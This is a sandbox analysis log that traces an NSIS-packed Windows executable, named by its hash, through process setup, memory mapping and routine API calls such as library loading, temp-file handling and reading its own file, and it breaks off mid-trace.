# Flog Txt Version 1 # Analyzer Version: 4.7.1 # Analyzer Build Date: Nov 21 2022 05:40:14 # Log Creation Date: 25.11.2022 09:25:20.750 Process: id = "1" image_name = "e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe" page_root = "0x5ae4e000" os_pid = "0xbb0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "analysis_target" parent_id = "0" os_parent_pid = "0x670" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe\" " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f213" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 118 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 119 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 120 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 121 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 122 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 123 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 124 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 125 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 126 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 127 start_va = 0x400000 end_va = 0x42dfff monitored = 1 entry_point = 0x40324f region_type = mapped_file name = "e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe" filename = "\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe") Region: id = 128 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 129 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 130 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 131 start_va = 0x7fff0000 end_va = 0x7ffd0d94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 132 start_va = 0x7ffd0d950000 end_va = 0x7ffd0db10fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 133 start_va = 0x7ffd0db11000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd0db11000" filename = "" Region: id = 272 start_va = 0x430000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 273 start_va = 0x700a0000 end_va = 0x700effff monitored = 0 entry_point = 0x700b8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 274 start_va = 0x70020000 end_va = 0x70099fff monitored = 0 entry_point = 0x70033290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 275 start_va = 0x77340000 end_va = 0x7741ffff monitored = 0 entry_point = 0x77353980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 276 start_va = 0x700f0000 end_va = 0x700f7fff monitored = 0 entry_point = 0x700f17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 277 start_va = 0x430000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 278 start_va = 0x620000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 279 start_va = 0x77340000 end_va = 0x7741ffff monitored = 0 entry_point = 0x77353980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 280 start_va = 0x75580000 end_va = 0x756fdfff monitored = 0 entry_point = 0x75631b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 281 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 282 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 283 start_va = 0x630000 end_va = 0x6edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 284 start_va = 0x743e0000 end_va = 0x74471fff monitored = 0 entry_point = 0x74420380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 285 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 286 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 287 start_va = 0x74f40000 end_va = 0x75086fff monitored = 0 entry_point = 0x74f51cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 288 start_va = 0x75210000 end_va = 0x7535efff monitored = 0 entry_point = 0x752c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 289 start_va = 0x430000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 290 start_va = 0x480000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 291 start_va = 0x6f0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 292 start_va = 0x75960000 end_va = 0x76d5efff monitored = 0 entry_point = 0x75b1b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 293 start_va = 0x753c0000 end_va = 0x7547dfff monitored = 0 entry_point = 0x753f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 294 start_va = 0x75540000 end_va = 0x75576fff monitored = 0 entry_point = 0x75543b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 295 start_va = 0x74820000 end_va = 0x74d18fff monitored = 0 entry_point = 0x74a27610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 296 start_va = 0x75700000 end_va = 0x758bcfff monitored = 0 entry_point = 0x757e2a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 297 start_va = 0x74e90000 end_va = 0x74f3cfff monitored = 0 entry_point = 0x74ea4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 298 start_va = 0x74490000 end_va = 0x744adfff monitored = 0 entry_point = 0x7449b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 299 start_va = 0x74480000 end_va = 0x74489fff monitored = 0 entry_point = 0x74482a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 300 start_va = 0x772c0000 end_va = 0x77317fff monitored = 0 entry_point = 0x773025c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 301 start_va = 0x776b0000 end_va = 0x776f3fff monitored = 0 entry_point = 0x776c9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 302 start_va = 0x77420000 end_va = 0x7749afff monitored = 0 entry_point = 0x7743e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 303 start_va = 0x74df0000 end_va = 0x74e34fff monitored = 0 entry_point = 0x74e0de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 304 start_va = 0x77320000 end_va = 0x7732bfff monitored = 0 entry_point = 0x77323930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 305 start_va = 0x77230000 end_va = 0x772bcfff monitored = 0 entry_point = 0x77279b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 306 start_va = 0x74e40000 end_va = 0x74e83fff monitored = 0 entry_point = 0x74e47410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 307 start_va = 0x75530000 end_va = 0x7553efff monitored = 0 entry_point = 0x75532e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 308 start_va = 0x74720000 end_va = 0x7480afff monitored = 0 entry_point = 0x7475d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 309 start_va = 0x6fc10000 end_va = 0x6fca1fff monitored = 0 entry_point = 0x6fc1dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 310 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 311 start_va = 0x7f0000 end_va = 0x977fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 312 start_va = 0x76df0000 end_va = 0x76e1afff monitored = 0 entry_point = 0x76df5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 313 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 314 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 315 start_va = 0x980000 end_va = 0xb00fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 316 start_va = 0xb10000 end_va = 0x1f0ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b10000" filename = "" Region: id = 317 start_va = 0x1f10000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 318 start_va = 0x2000000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 319 start_va = 0x580000 end_va = 0x610fff monitored = 0 entry_point = 0x5b8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 320 start_va = 0x74360000 end_va = 0x743d4fff monitored = 0 entry_point = 0x74399a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 321 start_va = 0x2000000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 322 start_va = 0x21c0000 end_va = 0x21cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 323 start_va = 0x70140000 end_va = 0x70158fff monitored = 0 entry_point = 0x701447e0 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 324 start_va = 0x76e20000 end_va = 0x7722afff monitored = 0 entry_point = 0x76e4adf0 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 325 start_va = 0x70130000 end_va = 0x70137fff monitored = 0 entry_point = 0x701317b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 326 start_va = 0x70120000 end_va = 0x70125fff monitored = 0 entry_point = 0x70121570 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 327 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 328 start_va = 0x21d0000 end_va = 0x2506fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 329 start_va = 0x774a0000 end_va = 0x77531fff monitored = 0 entry_point = 0x774d8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 330 start_va = 0x580000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 331 start_va = 0x2000000 end_va = 0x20fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 332 start_va = 0x2180000 end_va = 0x218ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002180000" filename = "" Region: id = 333 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 334 start_va = 0x75480000 end_va = 0x75503fff monitored = 0 entry_point = 0x754a6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 335 start_va = 0x470000 end_va = 0x470fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 336 start_va = 0x6fed0000 end_va = 0x7001afff monitored = 0 entry_point = 0x6ff31660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 337 start_va = 0x5c0000 end_va = 0x5c3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 338 start_va = 0x5d0000 end_va = 0x5eafff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000018.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db") Region: id = 339 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005f0000" filename = "" Region: id = 340 start_va = 0x1f10000 end_va = 0x1f4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 341 start_va = 0x1ff0000 end_va = 0x1ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001ff0000" filename = "" Region: id = 342 start_va = 0x2510000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002510000" filename = "" Region: id = 343 start_va = 0x2610000 end_va = 0x2e1bfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 344 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 1 os_tid = 0xd00 [0056.431] SetErrorMode (uMode=0x8001) returned 0x0 [0056.442] GetVersion () returned 0x23f00206 [0056.442] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x77340000 [0056.442] GetProcAddress (hModule=0x77340000, lpProcName="SetDefaultDllDirectories") returned 0x756b6270 [0056.443] SetDefaultDllDirectories (DirectoryFlags=0xc00) returned 1 [0056.443] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0056.443] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\UXTHEME.dll") returned 12 [0056.443] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\UXTHEME.dll") returned 0x74360000 [0056.468] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0056.468] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\USERENV.dll") returned 12 [0056.468] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\USERENV.dll") returned 0x70140000 [0056.477] GetSystemDirectoryA (in: lpBuffer=0x19fcc8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0056.477] wsprintfA (in: param_1=0x19fcdb, param_2="%s%s.dll" | out: param_1="\\SETUPAPI.dll") returned 13 [0056.477] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\SETUPAPI.dll") returned 0x76e20000 [0056.520] GetModuleHandleA (lpModuleName="VERSION") returned 0x0 [0056.520] GetSystemDirectoryA (in: lpBuffer=0x19fcb8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0056.520] wsprintfA (in: param_1=0x19fccb, param_2="%s%s.dll" | out: param_1="\\VERSION.dll") returned 12 [0056.520] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\VERSION.dll") returned 0x70130000 [0056.525] GetProcAddress (hModule=0x70130000, lpProcName="GetFileVersionInfoA") returned 0x70131490 [0056.525] GetModuleHandleA (lpModuleName="SHFOLDER") returned 0x0 [0056.525] GetSystemDirectoryA (in: lpBuffer=0x19fcb8, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0056.525] wsprintfA (in: param_1=0x19fccb, param_2="%s%s.dll" | out: param_1="\\SHFOLDER.dll") returned 13 [0056.525] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\SHFOLDER.dll") returned 0x70120000 [0056.531] GetProcAddress (hModule=0x70120000, lpProcName="SHGetFolderPathA") returned 0x70121300 [0056.531] InitCommonControls () [0056.531] OleInitialize (pvReserved=0x0) returned 0x0 [0056.548] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x19fe24, cbFileInfo=0x160, uFlags=0x0 | out: psfi=0x19fe24) returned 0x1 [0056.649] lstrcpynA (in: lpString1=0x423780, lpString2="NSIS Error", iMaxLength=1024 | out: lpString1="NSIS Error") returned="NSIS Error" [0056.649] GetCommandLineA () returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe\" " [0056.649] lstrcpynA (in: lpString1=0x42a000, lpString2="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe\" ", iMaxLength=1024 | out: lpString1="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe\" ") returned="\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe\" " [0056.650] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0056.653] GetTempPathA (in: nBufferLength=0x400, lpBuffer=0x42b400 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0056.658] lstrlenA (lpString="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp") returned 36 [0056.658] lstrcatA (in: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" [0056.658] CreateDirectoryA (lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp"), lpSecurityAttributes=0x0) returned 0 [0056.659] GetLastError () returned 0xb7 [0056.659] GetTickCount () returned 0x18a74c6 [0056.659] GetTempFileNameA (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="nsg", uUnique=0x0, lpTempFileName=0x42b000 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg74C6.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg74c6.tmp")) returned 0x74c6 [0056.661] DeleteFileA (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\nsg74C6.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\nsg74c6.tmp")) returned 1 [0056.662] GetTickCount () returned 0x18a74c6 [0056.662] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x42bc00, nSize=0x400 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe")) returned 0x62 [0056.662] GetFileAttributesA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe")) returned 0x20 [0056.662] CreateFileA (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x20, hTemplateFile=0x0) returned 0x200 [0056.663] lstrcpynA (in: lpString1=0x42ac00, lpString2="C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe", iMaxLength=1024 | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe") returned="C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe" [0056.663] lstrlenA (lpString="C:\\Users\\RDhJ0CNFevzX\\Desktop\\e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe") returned 98 [0056.665] lstrcpynA (in: lpString1=0x42c000, lpString2="e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe", iMaxLength=1024 | out: lpString1="e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe") returned="e524d7c7a6d4ade2651a65b9d0c5e162532a70495b957b9a5d34dcaaace571fe.exe" [0056.667] GetFileSize (in: hFile=0x200, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x3b1aa [0056.667] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.667] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.667] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x19fcb0, lpOverlapped=0x0 | out: lpBuffer=0x417130*, lpNumberOfBytesRead=0x19fcb0*=0x200, lpOverlapped=0x0) returned 1 [0056.668] ReadFile (in: hFile=0x200, lpBuffer=0x417130, nNumberOfBytesToRead=0x200, 